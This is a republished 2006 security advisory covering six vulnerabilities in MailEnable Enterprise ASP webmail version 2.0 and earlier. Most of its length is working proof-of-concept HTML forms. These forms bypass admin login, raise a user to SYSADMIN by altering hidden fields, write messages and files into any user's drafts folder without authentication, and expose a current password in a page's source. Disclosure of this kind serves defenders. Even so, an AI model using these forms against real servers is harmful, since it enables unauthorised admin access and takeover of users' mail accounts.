MailEnable Enterprise <= 2.0 (ASP Version) Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Multiple vulnerabilities found in MailEnable Enterprise ASP Version <= 2.0. Any user can access web administration, gain admin level, disable accounts, write in draft folders, and change passwords without authentication

                                                Hi, I&#39;m Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in 
MailEnable Enterprise Edition ASP Version &#60;= 2.0 that I listed them below:

1) - Any user can login to web administration site.
2) - Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
3) - Every one (ever no authenticated user) can write a message in &#34;Draft&#34; folder of any users!
4) - Every one can make &#34;myupload.ams&#34; on server in &#34;drafts&#34; folder of every user!
5) - Every one can make &#34;_myupload.csv&#34; on server in &#34;drafts&#34; folder of every user!
6) - For changing password it need the current password but current password is mention in source of &#34;ListAttachments.asp&#34; file, if XSS attack or Session hijacking happened then attacker can gain the user&#39;s current password.



Details&#39; Descriptions:

1)
Any user can login to web administration site with bug in &#34;main.asp&#34; (Enterprise)

Proof&#39;s exploit:
-----------------------Start--------------------------
&#60;FORM NAME=FrmMain ACTION=&#34;http://[URL]/meadmin/enterprise/lang/EN/main.asp&#34; METHOD=&#34;POST&#34;&#62;
	POSTOFFICE&#60;INPUT NAME=POSTOFFICE TYPE=&#34;text&#34; VALUE=&#34;postmaster&#34;&#62;&#60;br&#62;
&#60;input type=submit&#62;
&#60;/FORM&#62;
-----------------------End----------------------------

2)
Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!

Bug in &#34;MailOptions.asp&#34; file: remote authenticated user can change value of hidden field (name=&#34;LoginRights&#34;) 
from &#34;USER&#34; to &#34;ADMIN&#34; or &#34;SYSADMIN&#34; and change it&#39;s level to up! or change value of hidden field 
(name=&#34;LoginStatus&#34;) to &#34;0&#34; to disable him/her account!

Proof&#39;s exploit:
-----------------------Start--------------------------
&#60;FORM METHOD=&#34;post&#34; ACTION=&#34;http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit&#34;&#62;

&#60;TABLE BORDER=&#34;0&#34;&#62;
	&#60;TR&#62;&#60;TD&#62;Current Password:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=LoginPassword VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;New Password:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=NewLoginPassword VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;Confirm New Password:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=ConfirmNewLoginPassword VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
&#60;/TABLE&#62;
&#60;INPUT NAME=&#34;LoginDescription&#34; VALUE=&#34;Login description&#34;&#62;
&#60;INPUT NAME=&#34;LoginRights&#34; VALUE=&#34;SYSADMIN&#34;&#62;
&#60;INPUT NAME=&#34;LoginStatus&#34; VALUE=&#34;1&#34;&#62;
&#60;BR&#62;&#60;BR&#62;
&#60;INPUT type=submit value=&#34;UpTime!&#34;&#62;
&#60;/FORM&#62;
-----------------------End----------------------------

3)
Every one (ever no authenticated user) can write a message in &#34;Draft&#34; folder of any users!
Bug in &#34;Resolve.asp&#34; file: this file don&#39;t check authenticated user!

Proof&#39;s exploit:
--------------Start---------------------
&#60;FORM METHOD=&#34;post&#34; ACTION=&#34;http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp&#34;&#62;

&#60;TABLE BORDER=&#34;0&#34;&#62;
	&#60;TR&#62;&#60;TD&#62;ME_MAILBOX:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=ME_MAILBOX VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;ME_POSTOFFICE:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=ME_POSTOFFICE VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;Folder:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=Folder VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;ID:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=ID VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;ComposeMode:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=ComposeMode VALUE=&#34;General&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;	
	&#60;TR&#62;&#60;TD&#62;MsgFrom:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=MsgFrom VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;MsgCc:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=MsgCc VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;MsgTo:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=MsgTo VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;MsgBCC:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=MsgBCC VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;MsgBody:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=MsgBody VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
	&#60;TR&#62;&#60;TD&#62;MsgSubject:&#60;/TD&#62;&#60;TD&#62;&#60;INPUT name=MsgSubject VALUE=&#34;&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
&#60;/TABLE&#62;
&#60;BR&#62;&#60;BR&#62;
&#60;INPUT type=submit value=&#34;Update&#34;  CLASS=ME_Button&#62;
&#60;/FORM&#62;
--------------End---------------------

4)
Make &#34;myupload.ams&#34; on server in &#34;drafts&#34; folder of every user!
Show Mail Enable folder&#39;s path if &#34;username&#34; or &#34;postoffices&#34; be incorrect!

Proof&#39;s exploit:
-----------------------Start--------------------------
&#60;FORM NAME=FrmMain ACTION=&#34;http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp&#34; ENCTYPE=&#34;multipart/form-data&#34; METHOD=&#34;POST&#34;&#62;
	MESSAGEID&#60;INPUT NAME=MESSAGEID TYPE=&#34;text&#34; VALUE=&#34;test&#34;&#62;&#60;br&#62;
	POSTOFFICE&#60;INPUT NAME=POSTOFFICE TYPE=&#34;text&#34; VALUE=&#34;default&#34;&#62;&#60;br&#62;
	AUTH_PASSWORD&#60;INPUT NAME=AUTH_PASSWORD TYPE=&#34;text&#34; VALUE=&#34;&#34;&#62;&#60;br&#62;
	AUTH_USERNAME&#60;INPUT NAME=AUTH_USERNAME TYPE=&#34;text&#34; VALUE=&#34;testuser&#34;&#62;&#60;br&#62;
	Mode&#60;INPUT NAME=Mode TYPE=&#34;text&#34; VALUE=&#34;Compose&#34;&#62;&#60;br&#62;
	Folder&#60;INPUT NAME=Folder TYPE=&#34;text&#34; VALUE=&#34;\Drafts&#34;&#62;&#60;br&#62;
	ID&#60;INPUT NAME=ID TYPE=&#34;text&#34; VALUE=&#34;test&#34;&#62;&#60;br&#62;
&#60;TABLE&#62;
&#60;TR&#62;&#60;TD&#62;File Name&#60;/TD&#62;&#60;TD&#62;
&#60;INPUT TYPE=FILE NAME=&#34;txtFile&#34;&#62;
&#60;INPUT TYPE=submit VALUE=&#34;Add&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
&#60;/TABLE&#62;
&#60;/FORM&#62;
-----------------------End----------------------------

5)
Make &#34;_myupload.csv&#34; on server in &#34;drafts&#34; folder of every user!
Show Mail Enable folder&#39;s path if &#34;username&#34; or &#34;postoffices&#34; be incorrect!
Proof&#39;s exploit:
-----------------------Start--------------------------
&#60;FORM NAME=FrmMain ACTION=&#34;http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp&#34; ENCTYPE=&#34;multipart/form-data&#34; METHOD=&#34;POST&#34;&#62;
	MESSAGEID&#60;INPUT NAME=MESSAGEID TYPE=&#34;text&#34; VALUE=&#34;test123&#34;&#62;&#60;br&#62;
	POSTOFFICE&#60;INPUT NAME=POSTOFFICE TYPE=&#34;text&#34; VALUE=&#34;default&#34;&#62;&#60;br&#62;
	AUTH_PASSWORD&#60;INPUT NAME=AUTH_PASSWORD TYPE=&#34;text&#34; VALUE=&#34;&#34;&#62;&#60;br&#62;
	AUTH_USERNAME&#60;INPUT NAME=AUTH_USERNAME TYPE=&#34;text&#34; VALUE=&#34;testuser&#34;&#62;&#60;br&#62;
	Mode&#60;INPUT NAME=Mode TYPE=&#34;text&#34; VALUE=&#34;Compose&#34;&#62;&#60;br&#62;
	Folder&#60;INPUT NAME=Folder TYPE=&#34;text&#34; VALUE=&#34;\Drafts&#34;&#62;&#60;br&#62;
	ID&#60;INPUT NAME=ID TYPE=&#34;text&#34; VALUE=&#34;test123&#34;&#62;&#60;br&#62;
&#60;TABLE&#62;
&#60;TR&#62;&#60;TD&#62;File Name&#60;/TD&#62;&#60;TD&#62;
&#60;INPUT TYPE=FILE NAME=&#34;txtFile&#34;&#62;
&#60;INPUT TYPE=submit VALUE=&#34;Add&#34;&#62;&#60;/TD&#62;&#60;/TR&#62;
&#60;/TABLE&#62;
&#60;/FORM&#62;
-----------------------End----------------------------

6)
Have password in source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------


Product name: MailEnable Enterprise Edition
Version: All ASP version &#60;= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com

&#60;&#60; I hope secure world for all &#62;&#62;

# milw0rm.com [2006-06-09]
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1